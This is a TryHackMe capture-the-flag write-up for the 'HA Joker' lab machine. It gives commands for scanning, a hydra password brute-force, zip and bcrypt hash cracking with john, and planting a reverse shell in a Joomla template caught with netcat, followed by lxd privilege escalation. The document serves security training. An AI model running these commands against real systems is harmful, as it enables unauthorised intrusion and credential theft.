Tryhackme HA Joker CTF Writeup

Let’s start with nmap scanning first

Command: nmap -vv -sCV 10.10.185.86

Let’s do a directory scan on the http port number 80

Command: gobuster dir -u http://10.10.185.86 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt

Let’s take a look at the “secret.txt” file we found.

It looks like a conversation between Joker and Batman. However, these can be a username.

Let’s take a look at the other 8080 http port we found.

I think we can brute force here with the username we just found.

Command: hydra -l joker -P /home/hakanbey/Desktop/rockyou.txt -f 10.10.185.86 -s 8080 http-get

Yes we found the password. We can now log in.

Again, we need to scan the directory, but since we are logged in with 401, we need to specify this in the gobuster.

Command: gobuster dir -U joker -P ha**** -u http://10.10.185.86 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

We have to download the file named “backup”. I think this “backup” is an encrypted zip file.

We can crack the password of the zip file using the “zip2john” and “john” tools.

Command: /usr/sbin/zip2john backup > hash

Command: john -w=/home/hakanbey/Desktop/rockyou.txt hash

Yes, we now have the password. We can see the inside of the zip file.

Command: unzip backup

Two files named “db” and “site” came out of the zip. When we enter the file named “db”, we find the file “joomladb.sql”. Let’s read this differently.

Command: cat joomladb.sql|grep users

Yes, we got the password of the user named admin from the datebase file, but it is encrypted with bcrypt, let’s break it with john.

Command: john -w=/home/hakanbey/Desktop/rockyou.txt hash2

Now we have the password for the user named admin. Let’s log in from the Joomla login page.

Yes we are inside now. Let’s take a shell now. From the menu above, we go to the Extensions-Templates-Templates tab. Then select the “Beez3” theme and edit “error.php” from the side. Let’s paste our reverse shell codes here.

Now let’s start listening with netcat and enable reverse shell.

Command: nc -lvp 4444

Command: http://10.10.185.86:8080/templates/beez3/error.php

We spawn pty with Python and export xterm.

Command: python3 -c 'import pty;pty.spawn(''/bin/bash'')'

Command: export TERM=xterm

We can now increase the authority. We saw that the www-data user belongs to the lxd group.

First of all, we do the following steps on our own machine.

In this part, we do it on the target machine.

We are root now

Command: cd /mnt/root/root/ && cat /final.txt

Thank you for reading and solving

Cyber Security